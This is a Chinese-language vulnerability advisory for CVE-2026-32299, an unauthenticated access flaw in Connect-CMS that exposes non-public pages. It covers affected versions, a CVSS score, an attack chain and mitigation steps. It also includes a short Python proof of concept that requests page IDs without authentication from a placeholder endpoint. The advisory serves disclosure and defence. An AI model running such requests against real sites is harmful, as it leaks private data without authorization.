CVE-2026-32299 CVSS 7.5 高危

CVE-2026-32299 Connect-CMS 未授权访问漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32299

漏洞类型

权限绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Connect-CMS

漏洞概述

Connect-CMS 在 1.x 和 2.x 系列的特定版本中存在不当授权漏洞。该漏洞源于页面内容检索功能缺乏严格的权限验证，允许未经身份验证的攻击者直接获取非公开的敏感页面信息。此漏洞 CVSS 评分为 7.5，属于高危风险，建议管理员尽快升级至修复版本以避免数据泄露。

技术细节

该漏洞的根本原因是 Connect-CMS 在处理页面内容请求时，未在服务器端正确实施访问控制策略。在受影响版本（1.x <= 1.41.0 和 2.x <= 2.41.0）中，用于检索页面内容的 API 接口存在逻辑缺陷，导致系统仅依赖客户端请求参数而未校验当前会话的权限状态。根据 CVSS 向量 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N，攻击者无需任何用户交互或预先认证，即可通过网络向目标系统发送特制的 HTTP 请求。利用此漏洞，攻击者可以通过遍历页面 ID 或直接访问特定 URL，绕过前端或认证模块的限制，致使服务器响应并返回本应受限访问的敏感数据，造成严重的信息泄露。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用的是 Connect-CMS，并确认其版本在受影响范围内（1.x <= 1.41.0 或 2.x <= 2.41.0）。

STEP 2

利用

攻击者无需登录，直接向页面内容检索接口发送 HTTP GET 请求，请求中包含目标页面的 ID 或路径。

STEP 3

数据泄露

由于系统未验证访问权限，服务器直接返回了本应受限的页面内容，攻击者成功获取非公开信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with the actual vulnerable endpoint)
target_url = "http://target-cms.com/api/pages/view/{page_id}"

# Simulation of exploiting improper authorization to access a private page
# In the vulnerable version, authentication is not required (PR:N)
page_id = 1  # Example ID of a non-public page

try:
    # Sending request without authentication headers
    response = requests.get(target_url.format(page_id=page_id))
    
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed: Successfully retrieved non-public content.")
        print("Response Snippet:", response.text[:200])
    else:
        print("[-] Exploit failed or content not accessible.")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

Connect-CMS 1.x <= 1.41.0

Connect-CMS 2.x <= 2.41.0

防御指南

临时缓解措施

如果无法立即升级，建议在应用网关层面限制对 /pages 或相关内容检索 API 的外部访问，仅允许受信任的 IP 地址或已认证的会话访问，或者暂时下线涉及敏感信息展示的功能模块，直到完成补丁更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表